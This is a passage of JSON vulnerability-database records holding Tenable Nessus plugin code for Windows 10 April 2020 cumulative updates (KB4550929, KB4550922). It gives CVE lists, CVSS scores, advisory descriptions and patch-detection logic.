value:\"http://www.nessus.org/u?24b003af\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550929.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550929');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550929])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:11:39", "description": "The remote Windows host is missing security update 4550922.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969, CVE-2020-0970)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550922: Windows 10 Version 1803 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0913", "CVE-2020-0934", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550922.NASL", "href": "https://www.tenable.com/plugins/nessus/135466", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135466);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0913\",\n \"CVE-2020-0934\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0970\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0996\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550922\");\n script_xref(name:\"MSFT\", value:\"MS20-4550922\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0157-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550922: Windows 10 Version 1803 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550922.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969, \n CVE-2020-0970)\");\n # https://support.microsoft.com/en-us/help/4550922/windows-10-update-kb4550922\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9f6f3b84\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550922.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft 